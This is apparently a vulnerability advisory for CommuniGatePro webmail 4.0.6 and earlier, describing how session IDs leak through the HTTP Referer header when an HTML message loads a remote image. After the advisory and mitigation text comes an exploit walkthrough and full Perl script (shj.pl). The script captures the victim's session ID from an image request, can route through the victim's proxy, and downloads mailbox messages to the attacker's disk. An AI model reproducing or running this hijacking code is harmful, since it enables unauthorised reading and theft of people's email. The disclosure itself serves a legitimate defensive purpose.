Vulnerability in CommuniGatePro webmail under some circumstances may allow attacker to get access to users mailbox. Object: CommuniGatePro version 4.0.6 and earlier. Not vulnerable (according to Stalker.com) 4.1b2 (with UseCookies option) Vendor: Stalker Software Inc. www.stalker.com Description: Session ID used in CGP WebMail to track sessions is transferred in REFERER field of HTTP request when user browsers requests images or other resources from HTML message. Attacker can send HTML message with img src from his server and when user will read it in webmail, attacker may visit address from REFERER field and hijack current user session - read mailbox, write messages, etc. Mitigating Factors: If user has turned on IP session control attacker can access mailbox only from user IP (or use same proxy). Access is opened only for duration of session time. Solution: Upgrade to 4.1b2 or later version. Workaround: There is no known way to fix problem on server side, but users can configure their browsers, proxy servers and/or firewalls not to send REFERER field and change setting to allow only one IP to be used during session (this option alone doesn't help against exploit if attacker can use same proxy server as victim). Vendor status: Problem was known or long time and mentioned in CGP maillists. Vendor confirmed problem and fixed in 4.1b2. Exploit section --------------- Exploit howto ------------- Below is exploit code. Place it into cgi-bin, then (recommended) make symlink from DocumentRoot/AnyImage.gif to shj.pl, configure at least $url variable, and possible other vars and send victim HTML message with img src to your AnyImage.gif. When victim will read message, script will download messages 1..10 from his mailbox (if sucessfull). Script will work even if "require fixed address" option enabled (set $abuseproxy=1), but it needs access to users proxy (IP will be detected automatically). So, if your victim uses same corporate proxy as you, then you're lucky, you can own his mailbox! :) If victim uses HTTPS to access CGP webmail, use https:// link to image. some browsers will still send HTTP_REFERER if _both_ sites are https. Exploit code (shj.pl) ------------ #!/usr/bin/perl # # session hijacking and mail downloading exploit for CommuniGatePro 4.0.6 # # Yaroslav Polyakov. xenon (at) sysAttack (dot) com [email concealed] www.sysAttack.com # use LWP::UserAgent; # configuration vars $logfile="/tmp/log"; $url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N %"; $SIDREGEXP="Session/([0-9a-zA-Z\-]+)/"; $msglonum=1; $msghinum=10; $msgprefix="/tmp/hijacked-"; $abuseproxy=1; $proxyport=3128; sub printgif { $gif1x1="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\xff\x00\xc0\xc0\xc 0 \x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00 \x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b"; print "Content-Type: image/gif\n"; print "\n"; print "$gif1x1"; } open LOG, "> $logfile" || die("cant write to my log"); printgif; $remote=$ENV{'REMOTE_ADDR'}; $referer=$ENV{'HTTP_REFERER'}; print LOG "remote: $remote\nreferer: $referer\n"; # if($referer=~/SID=([0-9a-zA-Z\-]+)/){ if($referer=~/$SIDREGEXP/){ $SID=$1; print LOG "SID: $SID\n"; }else{ print LOG "sorry, cant find out SID\n"; exit; } # create request my $ua = new LWP::UserAgent; $ua->agent("shj - sysAttack CGP session HiJack/1.0"); if($abuseproxy){ print LOG "set proxy http://$remote:$proxyport/\n"; $ua->proxy('http', "http://$remote:$proxyport/"); } for($index=$msglonum;$index<=$msghinum;$index++){ $eurl=$url; $eurl =~ s/%N%/$index/; $eurl =~ s/%SID%/$SID/; print LOG "fetching $eurl\n"; $request = new HTTP::Request("GET", $eurl); $response = $ua->request($request); if($response){ print LOG $response->code." ".$response->message ."\n"; open MSG, "> $msgprefix$index" or die('cant crea te $msgprefix$index'); print MSG $response->content; close MSG; }else{ print LOG "undefined response\n"; } } close LOG; === P.S. And sorry for bad english :)